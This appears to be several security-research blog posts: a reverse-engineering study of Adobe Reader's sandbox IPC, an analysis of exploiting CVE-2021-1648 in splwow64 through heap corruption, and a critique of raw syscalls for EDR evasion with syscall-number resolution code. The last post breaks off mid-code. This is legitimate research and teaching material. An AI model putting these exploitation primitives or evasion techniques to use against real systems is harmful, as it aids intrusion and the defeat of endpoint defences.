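struct ServerControl {
    HANDLE ping_event;              // signaled by the target when a request is ready
    HANDLE pong_event;              // signaled by the broker when the answer is ready
    DWORD channel_size;             // size of the channel buffer
    BYTE* channel_buffer;           // broker-side pointer to this channel's buffer
    BYTE* shared_base;              // broker-side base of the shared memory section
    struct ChannelControl* channel; // the channel's control structure (lives in shared memory)
    void* dispatcher;               // IPC dispatcher servicing this channel
    struct ClientInfo target_info;  // process/handle info for the connected target
};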
In general, this describes what the IPC communication channel between the broker and target looks like. In the following sections we’ll take a look at these in more technical depth.
IPC Internals
The IPC facilities are established via TargetProcess::Init, and is really what we’re most interested in. The following snippet describes how the shared memory mapping is created and established between the broker and target:
The calculated shared_mem_size in the source code here comes out to 65536 bytes, which isn’t right. The shared section is actually 0x20000 bytes in modern Reader binaries.
Once the mapping is established and policies copied in, the SharedMemIPCServer
is initialized, and this is where things finally get interesting. SharedMemIPCServer initializes the ping/pong events for communication, creates channels, and registers callbacks.
The previous architecture diagram provides an overview of the structures and layout of the section at
runtime. In short, a ServerControl is a broker-side view of an IPC channel. It contains the server side event handles, pointers to both the channel and its buffer, and general information about the connected IPC endpoint. This structure is not visible to the target process and exists only in the broker.
A ChannelControl is the target process version of a ServerControl; it contains the target’s event handles, the state of the channel, and information about where to find the channel buffer. This channel buffer is where the CrossCallParams can be found as well as the call return information after a successful IPC dispatch.
Let’s walk through what an actual request looks like. Making an IPC request requires the target
to first prepare a CrossCallParams structure. This is defined as a class, but we can model it as a struct:
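A rough model, with offsets matching the serialization pseudo-code shown later; the real class lives in the Chromium sandbox’s crosscall_params.h:
struct CrossCallParams {
    DWORD tag;                          // +0x00: IPC tag (which function we're invoking)
    DWORD is_in_out;                    // +0x04: nonzero if any parameter is INOUT
    struct CrossCallReturn call_return; // +0x08: 52-byte return block, filled in by the broker
    DWORD params_count;                 // +0x3c: number of parameters that follow
    // ParamInfo param_info[params_count + 1] and the packed parameter data follow
};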
I’ve also gone ahead and defined a few other structures needed to complete the picture. Note that the return structure, CrossCallReturn, is embedded within the body of the CrossCallParams.
There’s a great ASCII diagram provided in the sandbox source code that’s highly instructive, and I’ve duplicated it below:
A tag is a dword indicating which function we’re invoking (just a number between 1 and approximately 255, depending on your version). This is handled server side dynamically, and we’ll explore that further later on.
Each parameter is then sequentially represented by a ParamInfo structure:
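Per the Chromium source, roughly:
struct ParamInfo {
    DWORD type;     // ArgType: WCHAR_TYPE, ULONG_TYPE, INOUTPTR_TYPE, ...
    DWORD offset;   // delta from the start of the CrossCallParams to the data
    DWORD size;     // size of the parameter data in bytes
};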
The offset is the delta value to a region of memory somewhere below the CrossCallParams structure. This is handled in the Chromium source code via the ptrdiff_t type.
Let’s look at a call in memory from the target’s perspective. Assume the channel buffer is at 0x2a10134:
0x2a10134 shows we’re invoking tag 3, which carries 7 parameters (0x2a10170).
The first argument is type 0x1 (we’ll describe types later on), is at delta
offset 0xa0, and is 0x86 bytes in size. Thus:
This shows the delta of the parameter data and, based on the parameter type, we know it’s a unicode string.
With this information, we can craft a buffer targeting IPC tag 3 and move onto
sending it. To do this, we require the
IPCControl
structure. This is a simple structure defined at the start of the IPC shared memory section:
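Again modeled on the Chromium source, roughly:
struct IPCControl {
    DWORD channels_count;               // number of channels (16 here)
    HANDLE server_alive;                // mutex used to detect a dead/crashed broker
    struct ChannelControl channels[1];  // start of the ChannelControl array
};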
So we have 16 channels, a handle to server_alive, and the start of our
ChannelControl array.
The server_alive handle is a mutex used to signal if the server has crashed.
It’s used during tag invocation in SharedmemIPCClient::DoCall, which we’ll describe later on. For now, assume that if we WaitForSingleObject on this and it returns WAIT_ABANDONED, the server has crashed.
ChannelControl is a structure that describes a channel, and is again defined as:
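Roughly, per the Chromium source:
struct ChannelControl {
    DWORD channel_base;     // offset of the channel buffer from the section base
    volatile LONG state;    // ChannelState: kFreeChannel, kBusyChannel, ...
    HANDLE ping_event;      // target -> broker: request is ready
    HANDLE pong_event;      // broker -> target: answer is ready
    DWORD ipc_tag;          // tag of the call currently in the channel
};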
The channel_base describes the channel’s buffer, ie. where the CrossCallParams structure can be found. This is an offset from the base of the shared memory section.
state is an enum that describes the state of the channel:
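At minimum, the states referenced in this post are (values as in the Chromium source; a few additional error/abandoned states exist as well):
enum ChannelState {
    kFreeChannel = 1,   // free for a client to claim
    kBusyChannel,       // claimed; the client is writing its request
    kAckChannel,        // picked up by the broker for processing
    // ... remaining states omitted here
};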
The ping and pong events are, as previously described, used to signal to the opposite endpoint that data is ready for consumption. For example, when the client has written out its CrossCallParams and is ready for the server, it signals:
When the server has completed processing the request, the pong_event is signaled and the client reads back the call result.
A channel is fetched via SharedMemIPCClient::LockFreeChannel and is invoked when GetBuffer is called. This simply identifies a channel in the IPCControl array wherein state == kFreeChannel, and sets it to kBusyChannel. With a
channel, we can now write out our CrossCallParams structure to the shared memory buffer. Our target buffer begins at channel->channel_base.
Writing out the CrossCallParams has a few nuances. First, the number of
actual parameters is NUMBER_PARAMS+1. According to the source:
// Note that the actual number of params is NUMBER_PARAMS + 1
// so that the size of each actual param can be computed from the difference
// between one parameter and the next down. The offset of the last param
// points to the end of the buffer and the type and size are undefined.
Note the offset written is the offset for index+1. In addition, this offset is aligned. This is a pretty simple function that byte aligns the delta inside the channel buffer:
// Increases |value| until there is no need for padding given the 2*pointer
// alignment on the platform. Returns the increased value.
// NOTE: This might not be good enough for some buffer. The OS might want the
// structure inside the buffer to be aligned also.
size_t Align(size_t value) {
size_t alignment = sizeof(ULONG_PTR) * 2;
return ((value + alignment - 1) / alignment) * alignment;
}
Because the Reader process is x86, the alignment is always 8.
The pseudo-code for writing out our CrossCallParams can be distilled into the following:
write_uint(buffer, tag);
write_uint(buffer+0x4, is_in_out);
// reserve 52 bytes for CrossCallReturn
write_crosscall_return(buffer+0x8);
write_uint(buffer+0x3c, param_count);
// calculate initial delta
delta = ((param_count + 1) * 12) + 12 + 52;
// write out the first argument's offset
write_uint(buffer + (0x4 * (3 * 0 + 0x11)), delta);
for idx in range(param_count):
write_uint(buffer + (0x4 * (3 * idx + 0x10)), type);
write_uint(buffer + (0x4 * (3 * idx + 0x12)), size);
// ...write out argument data. This varies based on the type
// calculate new delta
delta = Align(delta + size)
write_uint(buffer + (0x4 * (3 * (idx+1) + 0x11)), delta);
// finally, write the tag out to the ChannelControl struct
write_uint(channel_control->tag, tag);
Once the CrossCallParams structure has been written out, the sandboxed process signals the ping_event and the broker is triggered.
Broker side handling is fairly straightforward. The server registers a ping_event handler during SharedMemIPCServer::Init:
The ThreadPingEventReady function marks the channel as kAckChannel, fetches a pointer to the provided buffer, and invokes InvokeCallback. Once this
returns, it copies the CrossCallReturn structure back to the channel and signals the pong_event mutex.
InvokeCallback parses out the buffer and handles validation of data, at a high level (ensures strings are strings, buffers and sizes match up, etc.). This is probably a good time to document the supported argument types. There are 10 types in total, two of which are placeholder:
These are taken from internal_types,
but you’ll notice there are two additional types: ASCII_TYPE and MEM_TYPE, and are unique to Reader. ASCII_TYPE is, as expected, a simple 7bit ASCII string. MEM_TYPE is a memory structure used by the broker to read
data out of the sandboxed process, ie. for more complex types that can’t be trivially passed via the API. It’s additionally used for data blobs, such as PNG images, enhanced-format datafiles, and more.
Some of these types should be self-explanatory; WCHAR_TYPE is naturally a wide char, ASCII_TYPE an ascii string, and ULONG_TYPE a ulong. Let’s look at a few of the non-obvious types, however: VOIDPTR_TYPE, INPTR_TYPE, INOUTPTR_TYPE, and MEM_TYPE.
Starting with VOIDPTR_TYPE, this is a standard type in the Chromium sandbox so we can just refer to the source code. SharedMemIPCServer::GetArgs calls GetParameterVoidPtr. Simply, once the value itself is extracted it’s cast to a void ptr:
*param = *(reinterpret_cast<void**>(start));
This allows tags to reference objects and data within the broker process itself. An example might be NtOpenProcessToken, whose first parameter is a handle to the target process. This would be retrieved first by a call to OpenProcess, handed back to the child process, and then supplied in any future calls that may need to use the handle as a VOIDPTR_TYPE.
In the Chromium source code, INPTR_TYPE is extracted as a raw value via GetRawParameter and no additional processing is performed. However, in Adobe Reader, it’s actually extracted in the same way INOUTPTR_TYPE is.
INOUTPTR_TYPE is wrapped as a CountedBuffer and may be written to during the IPC call. For example, if CreateProcessW is invoked, the PROCESS_INFORMATION pointer will be of type INOUTPTR_TYPE.
The final type is MEM_TYPE, which is unique to Adobe Reader. We can define the structure as:
As mentioned, this type is primarily used to transfer data buffers to and from the broker process. It seems crazy: each tag is responsible for performing its own validation of the provided values before they’re used in any ReadProcessMemory/WriteProcessMemory call.
Once the broker has parsed out the passed arguments, it fetches the context dispatcher and identifies our tag handler:
ContextDispatcher = *(int (__thiscall ****)(_DWORD, int *, int *))(Context + 24);// fetch dispatcher function from Server control
target_info = Context + 28;
handler = (**ContextDispatcher)(ContextDispatcher, &ipc_params, &callback_generic);// PolicyBase::OnMessageReady
The handler is fetched from
PolicyBase::OnMessageReady,
which winds up calling
Dispatcher::OnMessageReady.
This is a pretty simple function that crawls the registered IPC tag list for
the correct handler. We finally hit InvokeCallbackArgs, unique to Reader,
which invokes the handler with the proper argument count:
In total, Reader supports tag functions with up to 17 arguments. I have no idea why that would be necessary, but it is. Additionally note the first two arguments to each tag handler: context handler (dispatcher) and CrossCallParamsEx. This last structure is actually the broker’s version of a CrossCallParams with more paranoia.
A single function is used to register IPC tags, called from a single initialization function, making it relatively easy for us to scrape them all at runtime. Pulling out all of the IPC tags can be done both statically and dynamically; the former is far easier, the latter is more accurate. I’ve implemented a static generator using IDAPython, available in this project’s repository (ida_find_tags.py), and can be used to pull all supported IPC tags out of Reader along with their parameters. This is not going to be wholly indicative of all possible calls, however. During initialization of the sandbox, many feature checks are performed to probe the availability of certain capabilities. If these fail, the tag is not registered.
Tags are given a handle to CrossCallParamsEx, which gives them access to the CrossCallReturn structure. This is defined here and, repeated from above, defined as:
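As a reminder, roughly (field order per my reading of the Chromium source; it packs to 52 bytes on x86):
struct CrossCallReturn {
    DWORD tag;              // tag of the answer
    DWORD call_outcome;     // result of the IPC operation itself (ResultCode)
    union {
        NTSTATUS nt_status; // result of the work performed on the caller's behalf
        DWORD win32_result;
    };
    HANDLE handle;          // optional handle returned to the caller
    DWORD extended_count;   // number of extended return values in use
    DWORD extended[8];      // extended return values (a union of types in the real source)
};                          // 5*4 + 32 = 52 bytes on x86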
This 52 byte structure is embedded in the CrossCallParams transferred by the sandboxed process. Once the tag has returned from execution, the following occurs:
if (error) {
if (handler)
SetCallError(SBOX_ERROR_FAILED_IPC, call_result);
} else {
memcpy(call_result, &ipc_info.return_info, sizeof(*call_result));
SetCallSuccess(call_result);
if (params->IsInOut()) {
// Maybe the params got changed by the broker. We need to upadte the
// memory section.
memcpy(ipc_buffer, params.get(), output_size);
}
}
and the sandboxed process can finally read out its result. Note that this mechanism does not allow for the exchange of more complex types, hence the availability of MEM_TYPE. The final step is signaling the pong_event, completing the call and freeing the channel.
Tags
Now that we understand how the IPC mechanism itself works, let’s examine the implemented tags in the sandbox. Tags are registered during initialization by a function we’ll call InitializeSandboxCallback. This is a large function that handles allocating sandbox tag objects and invoking their respective initalizers. Each initializer uses a function, RegisterTag, to construct and register individual tags. A tag is defined by a SandTag structure:
Here we see tag 3 with 7 arguments; the first is WCHAR_TYPE and the remaining 6 are ULONG_TYPE. This lines up with what we know to be the NtCreateFile tag handler.
Each tag is part of a group that denotes its behavior. There are 20 groups in total:
The names were extracted either from the Reader binary itself or through correlation with Chromium. Each dispatcher implements an initialization routine that invokes RegisterDispatchFunction for each tag. The number of registered tags will differ depending on the installation, version, features, etc. of the Reader process. SandboxBrokerServerDispatcher, for example, can vary by approximately 25 tags.
Instead of providing a description of each dispatcher in this post, I’ve instead put together a separate page, which can be found here. This page can be used as a tag reference and has some general information about each. Over time I’ll add my notes on the calls. I’ve additionally pushed the scripts used to extract tag information from the Reader binary and generate the table to the sander repository detailed below.
libread
Over the course of this research, I developed a library and set of tools for examining and exercising the Reader sandbox. The library, libread, was developed to programmatically interface with the broker in real time,
allowing for quickly exercising components of the broker and dynamically reversing various facilities. In addition, the library was critical during my fuzzing expeditions. All of the fuzzing tools and data will be available in the next post in this series.
libread is fairly flexible and easy to use, but still pretty rudimentary and, of course, built off of my reverse engineering efforts. It won’t be feature complete nor even completely accurate. Pull requests are welcome.
The library implements all of the notable structures and provides a few helper functions for locating the ServerControl from the broker process. As we’ve seen, a ServerControl is a broker’s view of a channel and it is held by the broker alone. This means it’s not somewhere predictable in shared memory and we’ve got to scan the broker’s memory hunting it. From the sandbox side there is also a find_memory_map helper for locating the base address of the shared memory map.
In addition to this library I’m releasing sander. This is a command line tool that consumes libread to provide some useful functionality for inspecting the sandbox:
$ sander.exe -h
[-] sander: [action] <pid>
-m - Monitor mode
-d - Dump channels
-t - Trigger test call (tag 62)
-c - Capture IPC traffic and log to disk
-h - Print this menu
The most useful functionality provided here is the -m flag. This allows one to monitor the IPC calls and their arguments in real time:
We’re also able to dump all IPC calls in the broker’s channels (-d), which can help debug threading issues when fuzzing, and trigger a test IPC call (-t). This latter function demonstrates how to send your own IPC calls via libread, as well as allowing you to test out additional tooling.
The last available feature is the -c flag, which captures all IPC traffic and logs the channel buffer to a file on disk. I used this primarily to seed part of my corpus during fuzzing efforts, as well as aid during some reversing efforts. It’s extremely useful for replaying requests and gathering a baseline corpus of real traffic. We’ll discuss this further in forthcoming posts.
That about concludes this initial post. Next up I’ll discuss the various fuzzing strategies used on this unique interface, the frustrating amount of failure, and the bugs shaken out.
In this post we’ll examine the exploitability of CVE-2021-1648, a privilege escalation bug in splwow64. I actually started writing this post to organize my notes on the bug and subsystem, and was initially skeptical of its exploitability. I went back and forth on the notion, ultimately ditching the bug. Regardless, organizing notes and writing blogs can be a valuable exercise! The vector is useful, seems to have a lot of attack surface, and will likely crop up again unless Microsoft performs a serious exorcism on the entire spooler architecture.
This bug was first detailed by Google Project Zero (GP0) on December 23, 2020[0]. While it’s unclear from the original GP0 description if the bug was
discovered in the wild, k0shl later detailed that it was his bug reported to MSRC in July 2020[1] and only just patched in January of 2021[2]. Seems, then,
that it was a case of bug collision. The bug is a usermode crash in the splwow64 process, caused by a wild memcpy in one of the LPC endpoints. This could lead to a privilege escalation from a low IL to medium.
This particular vector has a sordid history that’s probably worth briefly detailing. In short, splwow64 is used to host 64-bit usermode printer drivers
and implements an LPC endpoint, thus allowing 32-bit processes access to 64-bit printer drivers. This vector was popularized by Kaspersky in their great
analysis of Operation Powerfall, an APT they detailed in August of 2020[3]. As part of the chain they analyzed CVE-2020-0986, effectively the same bug as
CVE-2021-1648, as noted by GP0. In turn, CVE-2020-0986 is essentially the same bug as another found in the wild, CVE-2019-0880[4]. Each time Microsoft failed
to adequately patch the bug, leading to a new variant: first there were no pointer checks, then it was guarded by driver cookies, then offsets. We’ll look
at how they finally chose to patch the bug later on.
I won’t regurgitate how the LPC interface works; for that, I recommend reading Kaspersky’s Operation Powerfall post[3] as well as the blog by ByteRaptor[4].
Both of these cover the architecture of the vector well enough to understand what’s happening. Instead, we’ll focus on what’s changed since CVE-2020-0986.
To catch you up very briefly, though: splwow64 exposes an LPC endpoint that
any process can connect to and send requests. These requests carry opcodes and
input parameters to a variety of printer functions (OpenPrinter, ClosePrinter,
etc.). These functions occasionally require pointers as input, and thus the
input buffer needs to support those.
As alluded to, Microsoft chose to use offsets in the LPC request buffers instead of raw pointers. Since the input/output addresses were to be
used in memcpy’s, they need to be translated back from offsets to absolute addresses. The functions UMPDStringFromPointerOffset, UMPDPointerFromOffset, and UMPDOffsetFromPointer were added to accommodate this need. Here’s UMPDPointerFromOffset:
So as per the GP0 post, the buffer addresses are indeed restricted to
<=0x7fffffff. Implicit in this is also the fact that our offset is unsigned,
meaning we can only work with positive numbers; therefore, if our target
address is somewhere below our lpBufStart, we’re out of luck.
This new offset strategy kills the previous techniques used to exploit this
vulnerability. Under CVE-2020-0986, they exploited the memcpy by targeting a
global function pointer. When request 0x6A is called, a function
(bLoadSpooler) is used to resolve a dozen or so winspool functions used for
interfacing with printers:
These global variables are “protected” by RtlEncodePointer, as detailed by
Kaspersky[3], but this is relatively trivial to break when executing locally.
Using the memcpy with arbitrary src/dst addresses, they were able to overwrite
the function pointers and replace one with a call to LoadLibrary.
Unfortunately, now that offsets are used, we can no longer target any arbitrary
address. Not only are we restricted to 32-bit addresses, but we are also
restricted to addresses >= the message buffer and <= 0x7fffffff.
I had a few thoughts/strategies here. My first attempt was to target UMPD
cookies. This was part of a mitigation added after 0986 as again described by
Kaspersky. Essentially, in order to invoke the other functions available to
splwow64, we need to open a handle to a target printer. Doing this, GDI creates
a cookie for us and stores it in an internal linked list. The cookie is created
by LoadUserModePrinterDriverEx and is of type UMPD:
typedef struct _UMPD {
DWORD dwSignature; // data structure signature
struct _UMPD * pNext; // linked list pointer
PDRIVER_INFO_2W pDriverInfo2; // pointer to driver info
HINSTANCE hInst; // instance handle to user-mode printer driver module
DWORD dwFlags; // misc. flags
BOOL bArtificialIncrement; // indicates if the ref cnt has been bumped up to
DWORD dwDriverVersion; // version number of the loaded driver
INT iRefCount; // reference count
struct ProxyPort * pp; // UMPD proxy server
KERNEL_PVOID umpdCookie; // cookie returned back from proxy
PHPRINTERLIST pHandleList; // list of hPrinter's opened on the proxy server
PFN apfn[INDEX_LAST]; // driver function table
} UMPD, *PUMPD;
When a request for a printer action comes in, GDI will check if the request contains a valid printer handle and a cookie for it exists. Conveniently, there’s a function pointer table at the end of the UMPD structure called by a number of LPC functions. By using the pointer to the head of the cookie list, a global variable, we can inspect the list:
This is the first UMPD cookie entry, and we can see its function table contains 5 entries. Conveniently all of these heap addresses are 32-bit.
Unfortunately, none of these functions are called from splwow64 LPC. When processing the LPC requests, the following check is performed on the received buffer:
This effectively limits the functions we can call to 0x6a through 0x74, and the only times the function tables are referenced are prior to 0x6a.
Another strategy I looked at was abusing the fact that request buffers are allocated from the same heap, and thus linear. Essentially, I wanted to see if I could TOCTTOU the buffer by overwriting the memcpy destination after it’s transformed from an offset to an address, but before it’s processed. Since the splwow64 process is disposable and we can crash it as often as we’d like without impacting system stability, it seems possible. After tinkering with heap allocations for awhile, I discovered a helpful primitive.
When a request comes into the LPC server, splwow64 will first allocate a buffer and then copy the request into it:
Notice there are effectively no checks on the message size; this gives us the ability to allocate chunks of arbitrary size. What’s more is that once the request has finished processing, the output is copied back to the memory view and the buffer is released. Since the Windows heap aggressively returns free chunks of same sized requests, we can obtain reliable read/write into another message buffer. Here’s the leaked heap address after several runs:
Since we can only write to addresses ahead of ours, we can use 0xdd9e90 to write into 0x2b43fe0 (offset of 0x1d6a150). Note that these allocations are coming out of the front-end allocator due to their size, but as previously mentioned, we’ve got a lot of control there.
After a few hours and a lot of threads, I abandoned this approach as I was unable to trigger an appropriately timed overwrite. I found a memory leak in the port connection code, but it’s tiny (0x18 bytes) and doesn’t improve the odds, no matter how much pressure I put on the heap. I next attempted to target the message type field; maybe the connection timing was easier to land. Recall that splwow64 restricts the message type we can request. This is because certain message types are considered “privileged”. How privileged, you ask? Well, let’s see what 0x76 does:
A fully controlled memcpy with zero checks on the values passed. If we could gain access to this we could use the old techniques used to exploit this vulnerability.
After rigging up some threads to spray, I quickly identified a crash:
That’s the format of our spray, but you’ll notice it’s crashing during allocation. Basically, the message buffer chunk was freed and we’ve managed to overwrite the freelist chunk’s forward link prior to it being reused. Once our next request comes in, it attempts to allocate a chunk out of this sized bucket and crashes walking the list.
Notably, we can also corrupt a busy chunk’s header, leading to a crash during the free process:
This is an interesting primitive because it grants us full control over a heap chunk, both free and busy, but unlike the browser world, full of its class objects and vtables, our message buffer is flat, already assumed to be untrustworthy. This means we can’t just overwrite a function pointer or modify an object length. Furthermore, the lifespan of the object is quite short. Once the message has been processed and the response copied back to the shared memory region, the chunk is released.
I spent quite a bit of time digging into public work on NT/LF heap exploitation primitives in modern Windows 10, but came up empty. Most work these days focuses on browser heaps and, typically, abusing object fields to gain code execution or AAR/AAW. @scwuaptx[7] has a great paper on modern heap internals/primitives[6] and an example from a CTF in ‘19[5], but ends up using a FILE object to gain r/w which is unavailable here.
While I wasn’t able to take this to full code execution, I’m fairly confident this is doable provided the right heap primitive comes along. I was able to gain full control over a free and busy chunk with valid headers (leaking the heap encoding cookie), but Microsoft has killed all the public techniques, and I don’t have the motivation to find new ones (for now ;P).
The code is available on Github[8], which is based on the public PoC. It uses my technique described above to leak the heap cookie and smash a free chunk’s flink.
Patch
Microsoft patched this in January, just a few weeks after Project Zero FD’d the bug. They added a variety of things to the function, but the crux of the patch now requires a buffer size which is then used as a bounds check before performing memcpy’s.
GdiPrinterThunk now checks if DisableUmpdBufferSizeCheck is set in HKLM\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize. If it’s not, GdiPrinterThunk_Unpatched is used, otherwise, GdiPrinterThunk_Patched. I can only surmise that they didn’t want to break compatibility with…something, and decided to implement a hack while they work on a more complete solution (AppContainer..?). The new GdiPrinterThunk:
int GdiPrinterThunk(int MsgBuf, int MsgBufSize, int MsgOut, unsigned int MsgOutSize)
{
int result;
if ( gbIsUmpdBufferSizeCheckEnabled )
result = GdiPrinterThunk_Patched(MsgBuf, MsgBufSize, (__int64 *)MsgOut, MsgOutSize);
else
result = GdiPrinterThunk_Unpatched(MsgBuf, (__int64 *)rval, rval);
return result;
}
Along with the buf size they now also require the return buffer size and check to ensure it’s sufficiently large enough to hold output (this is supplied by the ProxyMsg in splwow64).
And the specific patch for the 0x6d memcpy:
SrcPtr = **MsgBuf_Off80;
if ( SrcPtr )
{
SizeHigh = SrcPtr[34];
DstPtr = *(void **)(MsgBuf + 88);
dwCopySize = SizeHigh + SrcPtr[35];
if ( DstPtr + dwCopySize <= _BufEnd // ensure we don't write past the end of the MsgBuf
&& (unsigned int)dwCopySize >= SizeHigh // ensure total is at least >= SizeHigh
&& (unsigned int)dwCopySize <= 0x1FFFE ) // sanity check WORD boundary
{
memcpy_0(DstPtr, SrcPtr, v276 + SrcPtr[35]);
}
}
It’s a little funny at first and seems like an incomplete patch, but it’s because Microsoft has removed (or rather, inlined) all of the previous UMPDPointerFromOffset calls. It still exists, but it’s only called from within UMPDStringPointerFromOffset_Patched and now named UMPDPointerFromOffset_Patched. Here’s how they’ve replaced the source offset conversion/check:
MCpySrcPtr = (unsigned __int64 *)(MsgBuf + 80);
if ( MsgBuf == -80 )
goto LABEL_380;
MCpySrc = *MCpySrcPtr;
if ( *MCpySrcPtr )
{
// check if the offset is less than the MsgBufSize and if it's at least 8 bytes past the src pointer struct (contains size words)
if ( MCpySrc > (unsigned int)_MsgBufSize || (unsigned int)_MsgBufSize - MCpySrc < 8 )
goto LABEL_380;
// transform offset to pointer
*MCpySrcPtr = MCpySrc + MsgBuf;
}
It seems messier this way, but is probably just compiler optimization. MCpySrc is the address of the source struct, which is:
typedef struct SrcPtr {
DWORD offset;
WORD SizeHigh;
WORD SizeLow;
};
Size is likely split out for additional functionality in other LPC functions, but I didn’t bother figuring out why. The destination offset/pointer is resolved in a similar fashion.
Funny enough, the GdiPrinterThunk_Unpatched really is unpatched; the vulnerable memcpy code lives on.
So over the years I’ve had a number of conversations about the utility of using syscalls in shellcode, C2s, or loaders in offsec tooling and red team ops. For reasons likely related to the increasing maturity of EDRs and their totalitarian grip in enterprise environments, I’ve seen an uptick in projects and blogs championing “raw syscalls” as a technique for evading AV/SIEM technologies. This post is an attempt to describe why I think the technique’s efficacy has been overstated and its utility stretched thin.
This diatribe is not meant to denigrate any one project or its utility; if your tool or payload uses syscalls instead of ntdll, great. The technique is useful under certain circumstances and can be valuable in attempts at evading EDR, particularly when combined with other strategies. What it’s not, however, is a silver bullet. It is not going to grant you any particularly interesting capability by virtue of evading a vendor data sink. Determining its efficacy in context of the execution chain is difficult, ambiguous at best. Your C2 is not advanced in EDR evasion by including a few ntdll stubs.
Note that when I’m talking about EDRs, I’m speaking specifically to modern samples with online and cloud-based machine learning capabilities, both attended and unattended. CrowdStrike Falcon, Cylance, Cybereason, Endgame, Carbon Black, and others have a wide array of ML strategies of varying quality. This post is not an analysis of these vendors’ user mode hooking capabilities.
Finally, this discussion’s perspective is that of post-exploitation, necessary for an attacker to issue a syscall anyway. User mode hooks can provide useful telemetry on user behavior prior to code execution (phishing stages), but once that’s achieved, all bets of process integrity are off.
syscalling
Very briefly, using raw syscalls is an old technique that obviates the need to use sanctioned APIs and instead uses assembly to execute certain functions exposed to user mode from the kernel. For example, if you wanted to read memory of another process, you might use NtReadVirtualMemory:
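Its prototype, as commonly declared for this undocumented ntdll export:
NTSTATUS NTAPI NtReadVirtualMemory(
    HANDLE  ProcessHandle,          // handle to the process to read from
    PVOID   BaseAddress,            // address in the target to start reading at
    PVOID   Buffer,                 // local buffer receiving the data
    SIZE_T  NumberOfBytesToRead,
    PSIZE_T NumberOfBytesRead);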
This function is exported by NTDLL; at runtime, the PE loader loads every DLL in its import directory table, then resolves all of the import address table (IAT) function pointers. When we call NtReadVirtualMemory our pointers are fixed up based on the resolved address of the function, bringing us to execute:
00007ffb`1676d4f0 4c8bd1 mov r10, rcx
00007ffb`1676d4f3 b83f000000 mov eax, 3Fh
00007ffb`1676d4f8 f604250803fe7f01 test byte ptr [SharedUserData+0x308 (00000000`7ffe0308)], 1
00007ffb`1676d500 7503 jne ntdll!NtReadVirtualMemory+0x15 (00007ffb`1676d505)
00007ffb`1676d502 0f05 syscall
00007ffb`1676d504 c3 ret
00007ffb`1676d505 cd2e int 2Eh
00007ffb`1676d507 c3 ret
This stub, implemented in NTDLL, moves the syscall number (0x3f) into EAX and uses syscall or int 2e, depending on the system bitness, to transition to the kernel. At this point the kernel begins executing the routine tied to code 0x3f. There are plenty of resources on how the process works and what happens on the way back, so please refer elsewhere.
Modern EDRs will typically inject hooks, or detours, into the implementation of the function. This allows them to capture additional information about the context of the call for further analysis. In some cases the call can be outright blocked. As a red team, we obviously want to stymie this.
With that, I want to detail a few shortcomings with this technique that I’ve seen in many of the public implementations. Let me once again stress here that I’m not trying to denigrate these tools; they provide utility and have their use cases that cannot be ignored, which I hope to highlight below.
syscall values are not consistent
j00ru maintains the go-to source for both the nt and win32k syscall tables, and by poking around in them you can see how values shift between functions and releases. Windows 10 alone currently has eleven columns for its different major builds, with some functions shifting numbers 4 or 5 times. This means we either need to know ahead of time what build the victim is running and tailor the syscall stubs to it (cumbersome at best in a post-exploitation environment), or we need to resolve the syscall number dynamically at runtime.
There are several proposed solutions for discovering the syscall number at runtime: sorting the Zw exports, reading the stubs directly out of the mapped NTDLL, querying j00ru’s Github repository (lol), or baking every potential code into the payload and selecting the correct one at runtime. These are all usable options, but each is either cumbersome or an unnecessary risk that raises our threat profile with the EDR’s ML model.
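As a rough illustration of the export-sorting option: syscall numbers are handed out in the same order the stubs are laid out in ntdll, so sorting the Zw exports by address gives you each function’s number as its sorted index. A sketch, assuming an x64 process and an export directory that hasn’t been tampered with (ZwReadVirtualMemory is just the example lookup):

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Sort the Zw* exports of the mapped ntdll by address; the index of a
// function in that ordering is its syscall number.
typedef struct { DWORD Rva; const char *Name; } ZW_EXPORT;

static int CompareByRva(const void *a, const void *b)
{
    DWORD ra = ((const ZW_EXPORT *)a)->Rva;
    DWORD rb = ((const ZW_EXPORT *)b)->Rva;
    return (ra > rb) - (ra < rb);
}

static DWORD SsnFromSortedExports(const char *zwName)
{
    BYTE *base = (BYTE *)GetModuleHandleA("ntdll.dll");
    IMAGE_DOS_HEADER *dos = (IMAGE_DOS_HEADER *)base;
    IMAGE_NT_HEADERS *nt = (IMAGE_NT_HEADERS *)(base + dos->e_lfanew);
    IMAGE_DATA_DIRECTORY dir =
        nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
    IMAGE_EXPORT_DIRECTORY *exp =
        (IMAGE_EXPORT_DIRECTORY *)(base + dir.VirtualAddress);

    DWORD *names     = (DWORD *)(base + exp->AddressOfNames);
    WORD  *ordinals  = (WORD  *)(base + exp->AddressOfNameOrdinals);
    DWORD *functions = (DWORD *)(base + exp->AddressOfFunctions);

    ZW_EXPORT zw[1024];
    DWORD count = 0;

    // Collect every Zw* export along with the RVA of its stub.
    for (DWORD i = 0; i < exp->NumberOfNames && count < 1024; i++) {
        const char *name = (const char *)(base + names[i]);
        if (name[0] == 'Z' && name[1] == 'w') {
            zw[count].Rva = functions[ordinals[i]];
            zw[count].Name = name;
            count++;
        }
    }

    qsort(zw, count, sizeof(ZW_EXPORT), CompareByRva);

    for (DWORD i = 0; i < count; i++)
        if (strcmp(zw[i].Name, zwName) == 0)
            return i;   // index in address order == syscall number

    return (DWORD)-1;
}

int main(void)
{
    printf("ZwReadVirtualMemory = 0x%lx\n",
           (unsigned long)SsnFromSortedExports("ZwReadVirtualMemory"));
    return 0;
}

Because nothing reads the stub bytes themselves, detoured prologues don’t break the resolution; the cost is a walk over the export directory.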
Let’s say you attempt to read NTDLL off disk to discover the stubs; that requires issuing CreateFile and ReadFile calls, both of which trigger minifilter and ETW events and potentially execute already established EDR hooks. Maybe that only raises your threat profile a few percentage points and you’re still golden. You then need to copy the stub out into an executable section, set up the stack and registers, and invoke it. Alternatively, you could use the already mapped NTDLL; that requires GetProcAddress, walking the PEB, or parsing out the IAT. Are the events surrounding the resolution of the stub more or less likely to increase the threat profile than just calling the NTDLL function itself?
The least-bad of these options is baking the codes into your payload and switching at runtime based on the detected system version. In memory this is going to look like an s-box switch, but there are no extraneous reads of on-disk or in-memory modules and no stumbling up and down the PEB. This is great, but cumbersome if you need to support a range of languages and execution environments, particularly those with on-demand or dynamic requirements.
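A hedged sketch of what that baked-in approach might look like; the build-to-number mapping below is purely illustrative (placeholder values, not taken from a real table), and RtlGetVersion stands in for whatever version detection you prefer:

#include <windows.h>
#include <winternl.h>

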